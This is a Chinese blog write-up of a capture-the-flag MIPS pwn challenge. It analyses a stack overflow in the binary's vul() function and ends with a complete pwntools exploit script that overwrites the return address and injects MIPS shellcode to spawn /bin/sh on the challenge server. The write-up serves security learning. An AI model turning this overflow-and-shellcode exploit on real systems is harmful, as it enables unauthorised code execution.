BUU刷题-Pwn-ycb_2020_mipspwn(MIPS_Shellcode)

Brinmon

于 2024-10-10 23:36:43 发布

阅读量225

点赞数 7

分类专栏： BUU_pwn解题wp MIPS_PWN 文章标签： ctf 网络安全 pwn MIPS_PWN

本文链接：https://blog.csdn.net/qq_65474192/article/details/142834829

版权

BUU_pwn解题wp 同时被 2 个专栏收录

41 篇文章 0 订阅

订阅专栏

MIPS_PWN

4 篇文章 0 订阅

订阅专栏

解题所涉知识点：

泄露或修改内存数据：

堆地址：
栈地址：
libc地址：
BSS段地址：
劫持程序执行流程：
获得shell或flag：MIPS_Shellcode

题目类型：
MIPS_Pwn

信息收集总结

题目信息：

┌──(kali㉿kali)-[~/…/BUU/MIPS/ycb_2020_mipspwn/mipspwn的附件]
└─$ file ./pwn2
./pwn2: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, not stripped
                                                                                                                    
┌──(kali㉿kali)-[~/…/BUU/MIPS/ycb_2020_mipspwn/mipspwn的附件]
└─$ checksec --file=pwn2    
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified   Fortifiable     FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   97 Symbols      No      0  3pwn2

libc版本：
wp借鉴：异构框架之mips框架的pwn学习笔记 | CN-SEC 中文网
https://www.cnblogs.com/trunk/p/17409345.html

MIPS依赖库:MonkeyJacky/mipsel-linux-uclibc: uclibc chain tools. (github.com)

程序运行回馈

┌──(kali㉿kali)-[~/…/BUU/MIPS/ycb_2020_mipspwn/mipspwn的附件]
└─$ qemu-mipsel -L ./ ./pwn2
Warrior,leave your name here:
1
hello,1

***********************
Welcome to the magic block world!
***********************
1.create a block
2.throw a block
3.write something on the block
4.exit the world
Your choice: 1
Give me a block ID: 1
how big: 1
Done!


***********************
Welcome to the magic block world!
***********************
1.create a block
2.throw a block
3.write something on the block
4.exit the world
Your choice:

核心伪代码分析：

存在利用的的代码：

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int chioce; // [sp+18h] [+18h] BYREF

  init();
  puts("Warrior,leave your name here:");
  read(0, name, 8u);
  printf("hello,%s", name);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      scanf("%d", &chioce);
      if ( chioce != 1 )
        break;
      add();
    }
    if ( chioce == 2 )
    {
      delete();
    }
    else if ( chioce == 3 )
    {
      edit();
    }
    else if ( chioce == 7 )
    {
      description();
    }
    else
    {
      if ( chioce == 4 )
      {
        puts("See you tomorrow~");
        exit(0);
      }
      puts("Invalid choice!");
    }
  }
}

ssize_t vul()
{
  char buf[56]; // [sp+18h] [+18h] BYREF

  return read(0, buf, 0xB0u);
}

存在栈溢出!

攻击思路总结

脚本：

from pwn import *

context(arch='mips', os='linux', log_level='debug')

file_name = './pwn2'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('node5.buuoj.cn', 29472)
else:
    r = process(['qemu-mipsel', '-L', '.', file_name])

elf = ELF(file_name)

def dbg():
    gdb.attach(r,"target remote localhost:1234")

def dbgg():
    raw_input()

menu = 'Your choice: '

#dbgg()
r.sendlineafter('Warrior,leave your name here:\n', 'z1r0')

r.sendlineafter(menu, '7')

p1 = b'a' * (60 - 4) + p32(0x41164C + 0x50) + p32(0x400F50)
r.sendlineafter('Write down your feeling:\n', p1)

shellcode = b'\x11\x01\x06\x24\xff\xff\xd0\x04\x00\x00\x06\x24\xe0\xff\xbd\x27\x14\x00\xe4\x27\x00\x00\x05\x24\xab\x0f\x02\x24\x0c\x00\x00\x00/bin/sh'

p2 = b'a' * 0x3c + p32(0x41164c + 0x50 + 0x58) + shellcode
r.send(p2)

r.interactive()